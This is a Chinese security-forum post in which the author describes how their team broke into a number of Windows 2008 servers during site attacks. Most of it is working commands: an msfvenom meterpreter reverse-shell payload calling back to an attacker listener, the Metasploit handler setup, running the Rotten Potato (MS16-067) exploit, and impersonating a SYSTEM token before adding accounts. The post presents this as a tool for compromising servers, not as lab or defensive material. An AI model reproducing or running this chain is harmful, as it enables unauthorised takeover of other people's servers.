搜索
查看: 6324|回复: 0

MSF+MS16-067提权拿下服务器

[复制链接]

330

主题

177

回帖

1071

积分

vip用户

积分
1071

注册会员活跃会员热心会员

QQ
发表于 2018-11-6 15:03:37 | 显示全部楼层 |阅读模式
这两天团队一直在一起日站,碰到了很多08的服务器。各种exp打下来不是没权限就是打上了补丁,然后东哥和Si试了下这个MS16-067也就是烂土豆,然后喜加好几台服务器。美滋滋。这篇文章就是记个笔记。



生成反弹木马命令

[pre]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe
[/pre]
反弹到的主机地址为192.168.1.33,端口为4433,生成的木马文件为4433.exe

将4433.exe上传到需要提权的目标服务器上

msfconsole下监听

[pre]
use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33 //实际情况中需要将192.168.1.33换成公网IP地址

set LPORT 4433

exploit
[/pre]

在shell里运行4433.exe

然后msf会收到一个session

这时候我们传上去potato.exe也就是我们的烂土豆,在这里下载

[pre]
use incognito
list_tokens -u //列出tokens
execute -cH -f ./potato.exe //执行exp
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM" //提权
[/pre]
劫持到system的令牌就舒服了,然后就是一顿net user,最后喜加一!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表